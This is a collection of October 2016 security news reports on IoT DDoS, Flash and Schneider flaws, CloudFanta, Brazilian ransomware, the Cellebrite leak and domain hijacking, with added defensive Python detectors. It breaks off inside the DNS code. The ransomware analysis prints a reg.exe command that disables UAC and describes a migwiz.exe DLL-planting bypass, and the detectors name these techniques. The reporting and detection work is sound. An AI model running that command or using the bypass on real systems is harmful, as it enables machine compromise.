"Not only has it highlighted vulnerabilities in the security of 'Internet of Things' (IOT) devices that need to be addressed, but it has also sparked further dialogue in the Internet infrastructure community about the future of the Internet," Hilton said.
Next DDoS Attack could reach Tens Of Terabits-Per-Second
If IoT security is not taken seriously, future DDoS attacks could reach tens of terabits per second, as estimated by network security firm Corero.
The DDoS threat landscape is skyrocketing and attacks could reach tens of terabits per second in size, following the discovery of a new zero-day attack vector that has the ability to amplify DDoS attacks by as much as 55x, Corero warned in a blog post published Tuesday.
According to the security firm, this new attack vector uses the Lightweight Directory Access Protocol (LDAP), which if combined with an IoT botnet, could break records in DDoS power.
Dave Larson of Corero explains:
"LDAP is not the first, and will not be the last, protocol or service to be exploited in this fashion. Novel amplification attacks like this occur because there are so many open services on the Internet that will respond to spoofed record queries. However, a lot of these attacks could be eased by proper service provider hygiene, by correctly identifying spoofed IP addresses before these requests are admitted to the network."
You can read more on Corero's official website.
How to Protect your Smart Device from being Hacked
1. Change Default Passwords of your connected devices: If you have any internet-connected device at home or work, change its credentials if it still uses the default ones. Keep in mind that Mirai malware scans for default settings.
2. Disable Universal Plug-and-Play (UPnP): UPnP comes enabled by default in every IoT device, which creates a hole in your router's security, allowing malware to infiltrate any part of your local network.
Check for "Universal Plug and Play" features and turn them OFF.
3. Disable Remote Management through Telnet: Go into your router’s settings and disable remote management, specifically through Telnet, a protocol that allows one computer to control another from a remote location. It has also been used in previous Mirai attacks.
4. Check for Software Updates and Patches: Last but not least, always keep your connected devices and routers up to date with the latest vendor firmware.
Check if your IoT device is vulnerable to Mirai malware
There is an online tool called Bullguard's IoT Scanner that can help you check if any IoT device over your network is vulnerable to Mirai malware.
If it detects any, contact the device's manufacturer or look out for a solution to patch those vulnerable gaps.
The tool makes use of the vulnerability scanning service Shodan for finding unprotected computers and webcams on your home network that are exposed to the public and potentially accessible to hackers.

LinkedIn to get Banned in Russia for not Complying with Data Localization Law
27.10.2016 thehackernews Social
The world's largest online professional network LinkedIn could face a ban in Russia after failing to comply with a Russian data localization law that compels companies to keep data on Russian users inside Russia.
If you are not aware, LinkedIn is the only major social network which is not banned in China, because the company agreed to cooperate with the Chinese government and remove controversial content.
However, LinkedIn could be the first social network in Russia to be blocked by the Russian state's federal media regulator, called Roskomnadzor, for not complying with the rules.
In July 2014, Russia approved amendments to the Russian Personal Data Law, which came into force on 1 September 2015, under which foreign tech companies are required to store the personal data of Russian citizens within the country.
However, Russia was not the first country to enforce such a law on foreign tech companies. A few months ago, Iran also imposed new regulations on all foreign messaging and social media apps to move 'data and activity' associated with Iranian citizens onto servers in Iran within one year.
The law was an attempt to protect its citizens' data from the NSA's mass surveillance revealed by whistleblower Edward Snowden.
Big technology companies, such as Google, Apple, and Viber, have reportedly already moved some of their servers to Russia this year.
However, companies like Facebook, Microsoft and Twitter have declined to comply with the law. Now the Russian Internet watchdog Roskomnadzor has targeted LinkedIn in its first attempt to pressure foreign companies into complying with its new privacy law.
Roskomnadzor has chosen LinkedIn as its first target due to the company's history of security problems. The massive 2012 LinkedIn hack exposed over 117 million passwords and usernames.
"They have a bad track record: Every year there’s a major scandal about the safety of user data," Roskomnadzor spokesman Vadim Ampelonskiy told the Moscow Times.
Roskomnadzor said that not only did LinkedIn refuse to move its servers to Russia, but the company also collects and sends data about Russian citizens who are not even users of the social network, without their consent.
"We are seeking a court order to block LinkedIn. We twice sent requests in the summer, but they did not provide answers to our questions," Ampelonskiy told the TASS news agency.
Moscow’s Tagansky District Court has also ruled in favor of Roskomnadzor, though LinkedIn has appealed to a higher court to have the ban lifted. The Moscow City Court will announce its decision on November 10.
The watchdog says it will lift the ban if the social networking company provides information that it has complied with the law and moved its servers holding data about Russians into the country.
Roskomnadzor – also known as the Federal Service for Supervision in the Sphere of Telecom, Information Technologies, and Mass Communications – is Russia's telecoms watchdog that runs a huge blacklist of websites banned in Russia.

Massive DDoS attacks caused broadband outages to StarHub customers
27.10.2016 securityaffairs Attack

Massive DDoS attacks caused broadband outages to StarHub customers; it is the first time that Singapore has experienced such an attack on its infrastructure.
StarHub in Singapore is the latest victim of massive DDoS attacks, powered by compromised IoT devices, against its DNS infrastructure.

It seems that the attackers used equipment owned by StarHub's own customers; the company mitigated the attacks by filtering the malicious traffic and increasing its DNS capacity.

“StarHub Confirms Cause of Home Broadband Incidents on 22 October and 24 October 2016

Singapore, 25 October 2016 – We have completed inspecting and analyzing network logs from the home broadband incidents on 22 October and 24 October and we are now able to confirm that we had experienced intentional and likely malicious distributed denial-of-service (DDoS) attacks on our Domain Name Servers (DNS). These caused temporary web connection issue for some of our home broadband customers.” reads a message published on Facebook by the company.

“On both occasions, we mitigated the attacks by filtering unwanted traffic and increasing our DNS capacity and restored service within two hours.”

The DNS server of the company was hit by a huge volume of traffic that knocked some home broadband customers offline.

The company has no doubts about the malicious nature of the DDoS attack that reached a magnitude and a level of sophistication never experienced before by StarHub.

“These two recent attacks that we experienced were unprecedented in scale, nature and complexity. We would like to thank our customers for their patience as we took time to fully understand these unique situations and to mitigate them effectively”, reads StarHub.

In the message shared by the company there is no explicit reference to the Mirai botnet, but StarHub representatives told The Straits Times that they believe the attack was powered by customers’ infected webcams and routers.

The company is inviting its customers to use only IoT devices from reputable vendors and to adopt a proper security posture when dealing with connected objects. The company has already started a campaign to clean up the equipment used by its customers.


Singapore’s Cyber Security Agency and the Infocomm Media Development Authority issued a notice to all Internet service providers and telco companies to improve the level of cyber security following two cyber attacks on StarHub.

“This is the first time that Singapore has experienced such an attack on its telco infrastructure,” reads the joint notice.

“Given the increasing connectedness of digital systems, there is no fool-proof solution. It takes a collective effort from companies and society to bolster our cyber resilience,” according to a joint statement late Wednesday.

CVE-2016-7855 flaw in Adobe Flash Player exploited in targeted attacks
27.10.2016 securityaffairs Vulnerebility

Adobe has issued a security patch for its Flash Player that fixes a critical vulnerability, tracked as CVE-2016-7855, used in targeted attacks.
Adobe has released a security update for its Flash Player that addresses a critical vulnerability, tracked as CVE-2016-7855, which has been exploited in the wild by threat actors.

According to the security advisory issued by Adobe, CVE-2016-7855 has been exploited in targeted attacks. The vulnerability is a use-after-free issue that attackers can trigger to achieve arbitrary code execution.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address a critical vulnerability that could potentially allow an attacker to take control of the affected system.” states the summary published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2016-7855 exists in the wild, and is being used in limited, targeted attacks against users running Windows versions 7, 8.1 and 10.”

The CVE-2016-7855 flaw affects Windows, Macintosh, Linux and Chrome OS, Flash Player and earlier, and and earlier for Linux.

The vulnerability was discovered by the researchers Neel Mehta and Billy Leonard from the Google Threat Analysis Group.

The researchers confirmed the exploitation of the CVE-2016-7855 vulnerability in a few targeted attacks against users running Windows 7, 8.1 and 10.

Security researchers at Adobe speculate that a sophisticated threat actor is behind the targeted attacks that exploited the issue.

Adobe issued the Flash Player and (Linux).

Both Microsoft and Google are also expected to address the vulnerability by issuing updates for Chrome, Edge, and Internet Explorer 11.

Adobe software continues to be a privileged target of hackers; zero-day and other security vulnerabilities affecting the company's products have been exploited in numerous attacks in the wild.

CloudFanta Malware Steals Banking Information Via Cloud Storage Apps
27.10.2016 securityaffairs Virus

Watch out: Netskope Threat Research Labs has spotted the CloudFanta malware stealing banking information via cloud storage apps.
Netskope Threat Research Labs published detailed research on the “CloudFanta” malware campaign, suspected since July 2016 of stealing more than 26,000 email credentials. CloudFanta abuses SugarSync, a cloud storage app, to distribute itself, steal user credentials and monitor online banking activity in order to extract sensitive information.

CloudFanta attacks its victims through an attachment link in a spearphishing email, luring the victim into clicking the provided link or executing a file. According to the experts at Netskope, the malware was distributed through the SugarSync URL “https://www[.]sugarsync[.]com/pf/D3202366_07280196_66523?directDownload=true”.

The downloaded zip archive “NF-9944132-br.zip” contained a downloader JAR file “NF-9944132-br.PDF.jar” with the dual extension “.PDF.jar”. The files retrieved by this downloader JAR are detected by Netskope Threat Protection as “Backdoor.Generckd.3549404” and “Gen:Variant.Symm.60013”.

The research by Netskope explains that users are primarily targeted by a link in a spearphishing email, which leads them to download a zip file containing a file with the dual extension “.PDF.JAR” to fool the victim. When the victim opens the JAR file, it silently downloads DLL (Dynamic Link Library) files in the background (to C:\users\public).


The CloudFanta malware goes undetected by network security devices such as firewalls and intrusion detection systems because it downloads the DLL files under the bogus extension “.PNG” and uses SSL/HTTPS communication. These DLL files are then renamed with the hostname and the extension “.TWERK”.
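
Both disguises described here, an executable served under an image extension and a document extension followed by an executable one, can be caught at a proxy or endpoint by checking the bytes rather than the name. The following is an added example and not Netskope's code: it flags a file named or served as an image whose content is really a Windows PE executable, and names such as “.PDF.jar”. The PNG signature and PE header checks are the real formats; the sample inputs, including the stand-in PE file, are constructed for the example.

```python
"""Masquerade checks for the CloudFanta download tricks (added example, constructed inputs)."""
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}
EXEC_EXTENSIONS = {".jar", ".exe", ".dll", ".scr", ".js", ".vbs"}


def looks_like_pe(data: bytes) -> bool:
    """A PE image starts with 'MZ' and carries the 'PE\\0\\0' signature at e_lfanew (offset 0x3C)."""
    if not data.startswith(b"MZ") or len(data) < 0x40:
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def extension_of(name: str) -> str:
    """Lower-cased last extension including the dot, or '' if there is none."""
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def has_double_extension(name: str) -> bool:
    """True for names like NF-9944132-br.PDF.jar: a document extension followed by an executable one."""
    parts = name.lower().split(".")
    if len(parts) < 3:
        return False
    return "." + parts[-2] in DOC_EXTENSIONS and "." + parts[-1] in EXEC_EXTENSIONS


def classify_download(name: str, content_type: str, data: bytes) -> str:
    """Return 'block', 'suspicious' or 'allow' for one downloaded object."""
    ext = extension_of(name)
    claims_image = ext in IMAGE_EXTENSIONS or content_type.lower().startswith("image/")
    if claims_image and looks_like_pe(data):
        return "block"          # executable hiding behind an image type, the ".PNG" DLL trick
    if has_double_extension(name):
        return "block"          # e.g. NF-9944132-br.PDF.jar
    if ext == ".png" and not data.startswith(PNG_MAGIC):
        return "suspicious"     # claims PNG but does not start with the PNG signature
    return "allow"


def fake_pe() -> bytes:
    """Constructed stand-in for a PE file: MZ stub, e_lfanew = 0x40, then the PE signature."""
    dos_header = bytearray(b"MZ" + b"\0" * 0x3E)
    dos_header[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(dos_header) + b"PE\0\0" + b"\0" * 20


if __name__ == "__main__":
    for name, ctype, blob in [
        ("update.png", "image/png", fake_pe()),
        ("logo.png", "image/png", PNG_MAGIC + b"\0" * 16),
        ("NF-9944132-br.PDF.jar", "application/zip", b"PK\x03\x04"),
    ]:
        print(name, "->", classify_download(name, ctype, blob))
```

The content check matters more than the name check: the article's DLLs are renamed again after download, so a rule keyed only on “.PNG” sees them for a moment at most, while the MZ/PE signature survives every rename.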

Ravi Balupari, director of engineering and cloud security research at Netskope, explains: “This malware campaign looks for the users’ email addresses and passwords,” he says. “It’s also targeting specific users.” The primary target of CloudFanta is currently Brazil.

How does this malware work? When victims enter their login credentials on an infected machine, the sign-in page redirects to a phishing sign-in page so that their credentials can be stolen. Once they enter their credentials, the data is uploaded to the C&C server and they are redirected back to the original sign-in page. Balupari explains that the malware also bypasses the security measures of virtual keyboards, which most banks use for sign-in.

When victims try to access their accounts, the malware takes a snapshot of every single click. It then saves a text file containing the mouse clicks, which lets attackers recover the victim’s passwords later.

SugarSync isn’t the only software application affected by CloudFanta; the malware also abused Dropbox to host malicious files. The ability to automatically download files and SugarSync’s broad user base made it easier for the malware to spread.

Traditional malware used other servers to host the attackers’ files; with the cloud, it is convenient for attackers to gain broader reach, spread cloud-based malware quickly and access it from anywhere.

Balupari explains, “Typically, cloud-based apps provide a convenient method for downloading files.”

Netskope has joined forces with SugarSync to stop the malware from spreading by taking down the malicious URLs. The collaboration will provide information on malicious links and monitor changes to CloudFanta in other malware campaigns.

Balupari said, “We’ll definitely see a rise in cloud malware campaigns going forward,” he further said, “Enterprises and customers who have been adopting cloud apps need to add additional layers of security.”

There are various steps businesses and individuals can take to prevent cloud malware from compromising their sensitive information, for example: a policy to block executable files served with the type “image/png”, end-to-end encryption software, enabling “view known file extensions” in Windows Explorer, two-factor authentication, Virtual Private Network (VPN) software, updated antivirus, and keeping the system updated.

IT pros should also make a practice of tracking and detecting unauthorized cloud services, and ensure that policies are in place for preventing data loss, managing data entry, and backing up sensitive data stored in the cloud.

Experts disclosed a critical flaw in Schneider Industrial Firewalls
27.10.2016 securityaffairs Vulnerebility

CyberX experts at the SecurityWeek’s 2016 ICS Cyber Security Conference disclosed a critical flaw in the Schneider Industrial Firewalls.
This week, at the SecurityWeek’s 2016 ICS Cyber Security Conference, researchers at industrial security firm CyberX disclosed several important vulnerabilities.

The experts demonstrated how hackers can target ICS systems and bypass the security measures in place.

Among the vulnerabilities disclosed by the experts, there is a flaw affecting a Schneider Electric industrial firewall that could be exploited by hackers for remote code execution.

The vulnerability affects products of Schneider Electric’s ConneXium TCSEFEC family of industrial Ethernet firewalls. This family of products is used in industrial contexts for the protection of SCADA systems, automation systems, industrial networks and other systems.

The experts discovered that the web-based administration interface of the Schneider Electric’s ConneXium TCSEFEC firewalls is affected by a buffer overflow. The exploitation of the flaw could allow attackers to execute arbitrary code.


The researchers also reported the flaw to the US ICS-CERT, which is expected to issue a security advisory.

A threat actor could exploit the flaw to change firewall rules, eavesdrop on traffic, inject malicious traffic, and disrupt communications.

The researchers highlighted that the flaw is exploitable even by attackers without specific technical skills.

“Exploitation of this security hole could also lead to manipulation of control systems, which, in a worst case scenario, could result in physical damage. Programmable logic controllers (PLCs) typically don’t have any type of authentication, allowing attackers to easily gain access and exploit known or zero-day flaws.” reported Eduard Kovacs from Security Week.

Unfortunately, Schneider industrial firewalls are easy for attackers to target because they are easy to find with search engines such as Shodan or Censys.

According to CyberX, the vendor Schneider Electric has already developed a security update to address the vulnerability, but has not yet released it.

The researchers from CyberX also reported seven zero-day flaws in PLC systems from a major unnamed vendor that is already working on a security update to fix them.

The “notification” ransomware lands in Brazil
26.10.2016 Kaspersky Virus
It’s unusual for a day to go by without finding some new variant of a known ransomware, or, what is even more interesting, a completely new one. Unlike the previously reported and now decrypted Xpan ransomware, this same-but-different threat from Brazil has recently been spotted in the wild. This time the infection vector is not a targeted remote desktop intrusion, but a more massively propagated malicious campaign relying on traditional spam email.

Since the infection is not done manually by the bad guys, their malware has a higher chance of being detected and we believe that is one of the reasons for them to have added one more level of protection to the code, resorting to a binary dropper to launch the malicious payload.

Given that this particular ransomware is fairly well known by now, instead of opting for the usual branding and marketing efforts in which most ransomware authors invest time, this group has decided to choose an unnamed campaign, showing only an email address for technical support and a bitcoin address for making the payment. It has become a kind of urban legend that if you can’t find something on Google, then it doesn’t exist.

Not very long ago, we saw the birth of truly autochthonous Brazilian ransomware, without much technical sophistication and mainly based on an open-source project. While there’s a long road ahead for local bad guys to achieve the level of the key players on the ransomware scene, this particular family is interesting to study since there have been versions in English, Italian, and now Brazilian Portuguese. Is this ransomware being sold as a commodity in underground forums with Brazilian crews just standing on the shoulders of giants? Or is this a regional operation just starting out?

As one of the very few ransomware variants that prepend a custom ‘Lock.’ extension to the encrypted files instead of appending it, the task of recognizing this malware is not particularly difficult. However, understanding its true origins could still be considered an ongoing debate.

The drop

If we trust that the first transaction corresponds to the very first victim, the campaign has probably been active since 2016-04-04 17:29:26 (April 4th, 2016). In reality, this is not exactly accurate. The timestamp of the original dropper shows that the sample was actually compiled at the beginning of October:

That would mean that the criminal behind the campaign might have had different ransomware campaigns running in the past, or is just using the same BTC wallet for more than one of his criminal deeds.

The dropper is protected by the popular .NET obfuscator SmartAssembly, as can be seen by the string “Powered by SmartAssembly”. Once executed, it tries to mask itself in the Alternate Data Stream of the NTFS file system in Windows:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Sims.exe:Zone.Identifier

It’s capable of disabling Windows LUA protection (the EnableLUA value that governs UAC):

cmd.exe /c %WINDIR%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

The mechanism used to write new information to the registry is quite unusual: it uses the official Windows application ‘migwiz.exe’ to bypass the UAC prompt, so no action from the user is required to execute with elevated privileges.

The malware is able to do that by writing a library ‘cryptbase.dll’ to the same folder as the ‘migwiz.exe’ file. Then, as soon as it’s launched, the process will load this library, which has a WinExec call that will launch the command line provided by the parameter.

They use MigWiz because this process is on Microsoft’s auto-elevate list, meaning it can be elevated without asking for explicit permission.
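
Two of the dropper's actions described above leave telemetry a defender can key on: the registry write that sets EnableLUA to 0, and a cryptbase.dll created in a directory other than the real system directory (the DLL planted beside migwiz.exe). The following is an added example, not part of the Kaspersky analysis, that runs those two checks over constructed log lines. The key=value log shape is made up for the example, modelled loosely on Sysmon registry-set and file-create events; the registry path, the value name, the Sims.exe startup path and the cryptbase.dll/migwiz.exe pairing are taken from the article, and the exact migwiz.exe directory is assumed.

```python
"""Detection of the EnableLUA write and cryptbase.dll planting (added example, constructed logs)."""
import re

# Constructed events in a made-up key=value format; quoted values may contain spaces.
SAMPLE_EVENTS = [
    'EventID=13 Image=C:\\Windows\\System32\\reg.exe '
    'TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA '
    'Details=DWORD (0x00000000)',
    'EventID=11 Image="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu'
    '\\Programs\\Startup\\Sims.exe" '
    'TargetFilename=C:\\Windows\\System32\\migwiz\\cryptbase.dll',   # migwiz directory assumed
    'EventID=11 Image=C:\\Windows\\System32\\svchost.exe '
    'TargetFilename=C:\\Users\\victim\\Downloads\\report.pdf',
    'EventID=13 Image=C:\\Windows\\regedit.exe '
    'TargetObject=HKCU\\Software\\Example\\Setting Details=DWORD (0x00000001)',
]

# key=value pairs; a value is either quoted, or a run of non-spaces optionally
# followed by a parenthesised suffix such as the "(0x00000000)" in a DWORD detail.
_KV = re.compile(r'(\w+)=("[^"]*"|\S+(?: \([^)]*\))?)')


def parse_event(line: str) -> dict:
    """Split one log line into a dict of its fields."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}


def is_uac_disabled(ev: dict) -> bool:
    """Registry-set event that writes 0 to ...\\Policies\\System\\EnableLUA."""
    if ev.get("EventID") != "13":
        return False
    target = ev.get("TargetObject", "").lower()
    return target.endswith("\\policies\\system\\enablelua") and "(0x00000000)" in ev.get("Details", "")


def is_cryptbase_hijack(ev: dict) -> bool:
    """File-create of cryptbase.dll anywhere except the real System32 / SysWOW64 directory."""
    if ev.get("EventID") != "11":
        return False
    path = ev.get("TargetFilename", "").lower()
    if not path.endswith("\\cryptbase.dll"):
        return False
    parent = path.rsplit("\\", 1)[0]
    return not (parent.endswith("\\system32") or parent.endswith("\\syswow64"))


def detect(lines) -> list:
    """Return (rule_name, evidence) pairs for every line that matches a rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if is_uac_disabled(ev):
            alerts.append(("UAC_DISABLED", ev.get("Image", "")))
        elif is_cryptbase_hijack(ev):
            alerts.append(("CRYPTBASE_HIJACK", ev.get("TargetFilename", "")))
    return alerts


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The cryptbase.dll rule is deliberately not tied to migwiz.exe alone: any copy of that DLL created outside the system directory is a DLL search-order plant worth reviewing, whichever auto-elevating binary sits next to it.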

As a simple means of information gathering, the dropper reads the name of the infected computer:

Moreover, it includes data-stealing techniques, such as retrieving information from the clipboard or capturing it as it is typed on the keyboard. Additionally, it has the capability to reboot the user’s machine:

@4333be: push ebp
@4333bf: mov ebp, esp
@4333c1: sub esp, 14h
@4333c4: push ebx
@4333c5: mov ebx, dword ptr [ebp+08h]
@4333c8: lea eax, dword ptr [ebp-04h]
@4333cb: push eax
@4333cc: push 00000028h
@4333ce: call dword ptr [00482310h] ;GetCurrentProcess@KERNEL32.DLL
@4333d4: push eax
@4333d5: call dword ptr [0048202Ch] ;OpenProcessToken@ADVAPI32.DLL
@4333db: test eax, eax
@4333dd: je 0043341Eh
@4333df: lea ecx, dword ptr [ebp-10h]
@4333e2: push ecx
@4333e3: push 00487D68h ;SeShutdownPrivilege

Finally, it drops and executes the file tmp.exe (corresponding hash B4FDC93E0C089F6B885FFC13024E4B9).

Hello sir, hello madam, your files have been locked

After the infection has been completed, as is usual in all ransomware families, the ransom note is shown. This time, it is written in Brazilian Portuguese and demanding 2000 BRL, which equates to around 627 USD or 1 BTC at the time of writing.

The bitcoin address provided for payment (1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4) shows total deposits of 1.89 BTC, although many transactions have been made since the creation of this wallet. This leads us to believe that either the criminal has been using the wallet for other purposes, or they have been bargaining with the victims and offering them a lower price, as suggested by the amount in each transaction.

The ransom note is very succinct, without giving any special payment URL or any other type of information. The victim will have to learn about bitcoin payments the hard way, and should they need support they can reach the criminals through a single email point of contact.

Hello Sir/Madam,
ALL of your files have been LOCKED and will only be UNLOCKED
if you pay an amount of R$ 2,000.00 (two thousand reais) in Bitcoins.
After paying this amount, just send me a screenshot to the email
and I will send you the program with the password to decrypt/unlock your files.
If payment is not made, all of your data will be locked
permanently and your computer will be completely formatted
(thus losing all the information on it, including email and banking passwords…)
Payment must be made to this Bitcoin address:
To convert your balance into bitcoins, visit the site:

Growth of ransomware in Brazil

The growth of ransomware in Brazil has been nothing short of impressive, considering that during October 2016 alone the popular ransomware family Packed.NSIS.MyxaH.gen grew by 287.96%, and another of the usual suspects, Trojan-Ransom.Win32.CryptXXX.gen, grew by 56.96% (each compared to the previous month).

In 2016, the three most important families of ransomware have been Trojan-Ransom.Win32.Blocker, accounting for 49.63% of the total infections, Trojan-Ransom.NSIS.Onion, 29.09%, and Trojan-Ransom.Win32.Locky, 3.99%.

Currently, Brazil is the eighth most affected country worldwide as far as ransomware infections go for this year, and ranked first in Latin America.

Indicators of compromise

File: 04.exe
Size: 1049600
Compiled: Saturday, October 8 2016, 11:22:30 – 32 Bit .NET

File: tmp.exe
Size: 842220
MD5: BB4FDC93E0C089F6B885FFC13024E4B9
Compiled: Sunday, January 29 2012, 21:32:28 – 32 Bit

Hacking Firmware from Mobile Phone Hacking Company Leaked Online
26.10.2016 thehackernews Mobil
The Israeli firm Cellebrite, which provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had its firmware and software leaked online.
Yes, you heard that right. Cellebrite's most sensitive in-house capabilities have been made public by one of its products' resellers, who is now distributing copies of Cellebrite's firmware and software for anyone to download.
The apparent reseller is McSira Professional Solutions, which hosts software for various versions of Cellebrite's Universal Forensic Extraction Device (UFED).
UFED is one of the company's key products that help investigators bypass the security mechanisms of mobile phones, especially iPhones, and extract all data and passwords from them.
To see Cellebrite's capabilities against iOS devices, you can watch the 2015 YouTube video (below), which demonstrates one of the company's products unlocking an iPhone in a few hours.
Download Links to Cellebrite's Key Forensic Product
McSira is allowing anyone to download the firmware for the UFED Touch and UFED 4PC (PC version). The company is also hosting copies of UFED packages for different mobile phone brands, including Apple, Samsung, Blackberry, Nokia, and LG.
Besides this, McSira is also hosting copies of Cellebrite forensic software, such as the UFED Phone Detective, UFED Cloud Analyzer and Link Analyzer, which allow investigators to analyze seized data further.
McSira is likely offering these download links for firmware and software files so that its customers – which, according to its site, are "police, military and security agencies in the E.U. and other parts of the world" – can conveniently update their hardware to the latest version.

However, the company has also opened the door for researchers, hackers, and its competitors to download these leaked files, reverse-engineer them, and figure out how Cellebrite's tools break into mobile phones.
Researchers Started Examining Leaked Software and Firmware
According to Joseph Cox, freelance security journalist for Motherboard, an unnamed researcher has already started examining the leaked files to disclose the kind of exploits Cellebrite uses to bypass even strong security mechanisms on mobile phones, as well as weaknesses in the implementation of affected phones that could be fixed.
Another researcher, Pedro Vilaça from SentinelOne, said he had already cracked some of the Cellebrite software and run it against an old iPad, though he said he needed to explore the leaked files more to understand the capabilities of that software better.
"Doesn't seem to be trying to exploit things but just data extraction," Vilaça told Motherboard. "For example, I had to pair my device with iTunes for the logical extraction feature to work."
Mike Reilly, a PR firm representative who works with Cellebrite, said the McSira website's links "don't allow access to any of the solutions without a license key," meaning that downloaders need a key (code) issued by Cellebrite or its reseller to run the software.
At the time of writing, McSira is hosting these files, but it is not clear how long the files will be hosted on its website.
McSira and Cellebrite have yet to comment on the matter.

Domain Hijacking – An Invisible and Destructive Threat We Should Watch For
26.10.2016 securityaffairs Hacking

Morphus Labs warns about another major threat, domain hijacking, an incident that can completely subvert your information security strategy.
Morphus Labs warns this week about another major threat. Renato Marinho and Victor Pasknel handled a domain hijacking incident, a threat that can completely subvert your information security strategy. In this article they give details of how the incident was handled and how we can prevent similar scenarios.

It’s Saturday morning and you, the CSO of a huge company, start to receive messages from various sources, including the press, informing you that all of your organization’s Internet addresses are sending visitors to fake websites offering malicious content in the form of fake security modules and/or updates.

What appeared to be a website defacement attack turned out to be something much worse. On closer examination, you realize that cybercriminals had in fact hijacked the organization’s entire domain and directed all addresses to fake websites aimed at stealing information from your customers and spreading malicious code. The worst thing is that there was no action that depended exclusively on you to solve the problem immediately.

In this article, we describe the incident response to the scenario described above and how this threat, which is capable of subverting your entire security strategy and investment, can be mitigated with very simple actions.

Domain Name System (DNS) basics
To better understand what happened, it’s important to understand some basic DNS concepts. If you are familiar with this subject, skip ahead to the Domain Hijacking section.

DNS stands for Domain Name System and works as a foundation for the Internet. All the address names we use daily to reach websites and other Internet services have to be translated to IP (Internet Protocol) addresses; this translation, or resolution, between an Internet address name and an IP address is the main role of DNS servers.

DNS servers form a hierarchy of sorts, through which resolution requests are passed until the server in charge of resolving the names for a certain domain is reached. The root of this hierarchy, the invisible dot (“.”) at the end of any Internet address, is controlled by a group of DNS servers distributed in different places around the world. Those root DNS servers have to know the IP addresses of the DNS servers that are in charge of all Top Level Domains (TLDs), like “.com”. The “.com” DNS servers, in turn, have to know the IP addresses of the DNS servers that are in charge of your company’s domain name, like “yourdomain.com”, and so on.

For example, when someone asks for “www.yourdomain.com.”, the request reaches the root servers (“.”), which in turn refer it to the “.com” servers, which in turn refer it to your company’s DNS servers, which finally resolve the address “www” and return the correct IP address.

The TLDs are controlled and managed by registry operators, also called Network Information Center (NIC). The registry operators manage the registration of domain names within the domains for which they are responsible. So, the “.com” registry operator is the organization that will hold the configuration of the DNS Servers IP addresses that are in charge of resolving the IP address of a domain like “yourcompany.com”.

Domain Hijacking
To register or manage a domain with any registry operator, you first have to create an account (basically, a username and password) on their web portal. This account is used to manage the IP addresses of the DNS servers that will point to the IP addresses of your website or e-mail servers.

Note that the access credentials to the operator’s portal are extremely sensitive information. A malicious actor in possession of such information would be able to change any configuration of your domains, including the IP addresses of the DNS servers. In short, they could hijack your company’s Internet domain and point its websites and e-mail to any address they wanted.

In the incident we handled at Morphus Labs, that’s exactly what happened. The bad actors stole the registry operator credentials and changed the primary and secondary DNS server configuration, pointing them to the criminals’ own servers. After that, all the company’s customers were directed to a fake company website, where the fake content urged them to download malicious files. We can imagine what the criminals’ strategy would have been had they succeeded in spreading their malware.

Needless to say, the crooks changed the password after gaining access to the portal. In other words, they hijacked the domain and made its recovery dependent on the registry operator. “Manual” account recovery is usually neither easy nor fast.

The Incident Response
Unlike the majority of cyber incidents, there is almost nothing you can do in your own infrastructure to revert the situation, such as restoring backups or configurations. As in this incident, all servers were intact.
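The delegation chain from the DNS basics section and the effect of changing it at the registry, modelled as an added Python example (not Morphus Labs' code). Zone data, server names and addresses are constructed placeholders; `yourdomain.com` stands for the victim domain. The model shows why every name under the domain lands on the criminals' host while the company's own name servers still answer correctly when asked directly, and ends with the simple baseline check a defender can run against the name servers the registry currently reports.

```python
"""Toy model of DNS delegation and of what a registrar-level hijack changes.

Added illustration, not code from the Morphus Labs write-up. Zone data,
server names and IP addresses (RFC 5737 documentation ranges) are constructed.
"""
from typing import Any, Dict, Iterable, Optional, Set

# A zone maps an owner name to its records: "A" -> one IPv4 address, or
# "NS" -> the set of servers the child zone is delegated to.
Zone = Dict[str, Dict[str, Any]]

# Baseline: the name servers the company registered for its domain.
EXPECTED_NS: Set[str] = {"ns1.yourdomain.com.", "ns2.yourdomain.com."}


def build_servers(delegated_ns: Set[str]) -> Dict[str, Zone]:
    """Servers of a three-level hierarchy (. -> com. -> yourdomain.com.).

    `delegated_ns` is what the ".com" registry holds for yourdomain.com; the
    company's own zone is untouched whatever the registry says.
    """
    company_zone: Zone = {
        "www.yourdomain.com.": {"A": "192.0.2.10"},
        "mail.yourdomain.com.": {"A": "192.0.2.25"},
    }
    # Constructed: a zone served by the criminals' server, every name -> one host.
    rogue_zone: Zone = {
        "www.yourdomain.com.": {"A": "198.51.100.66"},
        "mail.yourdomain.com.": {"A": "198.51.100.66"},
    }
    return {
        "root.": {"com.": {"NS": {"a.gtld-servers.example."}}},
        "a.gtld-servers.example.": {"yourdomain.com.": {"NS": set(delegated_ns)}},
        "ns1.yourdomain.com.": company_zone,
        "ns2.yourdomain.com.": company_zone,
        "ns1.rogue.example.": rogue_zone,
    }


def resolve(name: str, servers: Dict[str, Zone], start: str = "root.") -> Optional[str]:
    """Follow delegations from `start` (normally the root) as a resolver does."""
    server = start
    for _ in range(8):  # bound the walk so a delegation loop cannot spin forever
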